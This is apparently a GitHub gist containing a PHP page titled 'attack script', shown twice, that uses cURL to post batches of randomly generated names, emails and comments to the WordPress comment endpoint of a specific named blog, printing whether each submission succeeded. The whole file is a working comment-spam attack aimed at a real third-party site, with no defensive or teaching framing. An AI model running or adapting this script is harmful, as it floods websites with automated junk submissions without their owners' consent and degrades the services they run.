/gist:22457214c34564647eea

## gistfile1.pl
<!DOCTYPE html>
<html>
<head>
<title>attack script</title>
</head>
<body>
<?php

/*  ------------ Functions needed for attack  --------------------- */

function rand_str($len)
{
    $str = "";
    while ($len-- > 0)
    {
        $val = rand(0,1) ? rand(ord("A"),ord("Z")) : rand(ord("a"),ord("z"));
        $str .= chr($val);
    }
    return $str;
}

/*  ----------------- Misc. preprocessing  -------------------- */
date_default_timezone_set('America/Los_Angeles');


/*  ----------------- Initialize new cURL session -------------------- */

$curl = curl_init();
$page_url = "http://feucht.us/blog";
$funct_url = "http://feucht.us/blog/wp-comments-post.php";
curl_setopt($curl, CURLOPT_URL, $funct_url);


/*  ---------------------- Begin attack  ----------------------------- */

echo("<h1>Comment spam run on <i>". $page_url . "</i> on " . date("d-m-Y h:i:s") . "</h1>");
echo("<h3><b>RESULTS:</b></h3>");
$num_coms = 10; /* # of comments to post */
$wait_period = 1; /* # of seconds to wait between posting each comment */
$name_length_bounds = array(5,20); /* min and max length of random name to be generated */
$alias_length_bounds = array(8,15); /* min and max length of random email prefix to be generated */
$email_length_bounds = array(3,10); /* min and max length of random email provider to be generated */
$comment_length_bounds = array(5, 40); /* min and max length of random comment to be generated */
while ($num_coms-- > 0)
{
  /* Pause between the posting of comments: */
  sleep($wait_period);

  /* Initialize random names, email addresses and comments: */
  $rname = rand_str(rand($name_length_bounds[0], $name_length_bounds[1]));
  $remail = rand_str(rand($alias_length_bounds[0], $alias_length_bounds[1])) . "@" . rand_str(rand($email_length_bounds[0], $email_length_bounds[1])) . ".com";
  $rcomment = rand_str(rand($comment_length_bounds[0], $comment_length_bounds[1]));

  /* Create POST request string from random text and add to cURL object */
  $post_string = "author=" . $rname . "&email=" . $remail . "&comment=" . $rcomment;
  curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
  /* Execute the request and print out whether it succeeded or failed. */
  echo(curl_exec($curl) ? "<hr><p><span style='color:green'>Successfully submitted</span>" : "<hr><p><span style='color:red'>Did not successfully submit</span>");
  echo(" POST request <b>" . $post_string . "</b></p><p>to</p><p><b>" . $funct_url . "</b></p>");
}

?>
</body>
</html>
	<!DOCTYPE html>
	<html>
	<head>
	<title>attack script</title>
	</head>
	<body>
	<?php

	/* ------------ Functions needed for attack --------------------- */

	function rand_str($len)
	{
	$str = "";
	while ($len-- > 0)
	{
	$val = rand(0,1) ? rand(ord("A"),ord("Z")) : rand(ord("a"),ord("z"));
	$str .= chr($val);
	}
	return $str;
	}

	/* ----------------- Misc. preprocessing -------------------- */
	date_default_timezone_set('America/Los_Angeles');


	/* ----------------- Initialize new cURL session -------------------- */

	$curl = curl_init();
	$page_url = "http://feucht.us/blog";
	$funct_url = "http://feucht.us/blog/wp-comments-post.php";
	curl_setopt($curl, CURLOPT_URL, $funct_url);


	/* ---------------------- Begin attack ----------------------------- */

	echo("<h1>Comment spam run on <i>". $page_url . "</i> on " . date("d-m-Y h:i:s") . "</h1>");
	echo("<h3><b>RESULTS:</b></h3>");
	$num_coms = 10; /* # of comments to post */
	$wait_period = 1; /* # of seconds to wait between posting each comment */
	$name_length_bounds = array(5,20); /* min and max length of random name to be generated */
	$alias_length_bounds = array(8,15); /* min and max length of random email prefix to be generated */
	$email_length_bounds = array(3,10); /* min and max length of random email provider to be generated */
	$comment_length_bounds = array(5, 40); /* min and max length of random comment to be generated */
	while ($num_coms-- > 0)
	{
	/* Pause between the posting of comments: */
	sleep($wait_period);

	/* Initialize random names, email addresses and comments: */
	$rname = rand_str(rand($name_length_bounds[0], $name_length_bounds[1]));
	$remail = rand_str(rand($alias_length_bounds[0], $alias_length_bounds[1])) . "@" . rand_str(rand($email_length_bounds[0], $email_length_bounds[1])) . ".com";
	$rcomment = rand_str(rand($comment_length_bounds[0], $comment_length_bounds[1]));

	/* Create POST request string from random text and add to cURL object */
	$post_string = "author=" . $rname . "&email=" . $remail . "&comment=" . $rcomment;
	curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
	/* Execute the request and print out whether it succeeded or failed. */
	echo(curl_exec($curl) ? "<hr><p><span style='color:green'>Successfully submitted</span>" : "<hr><p><span style='color:red'>Did not successfully submit</span>");
	echo(" POST request <b>" . $post_string . "</b></p><p>to</p><p><b>" . $funct_url . "</b></p>");
	}

	?>
	</body>
	</html>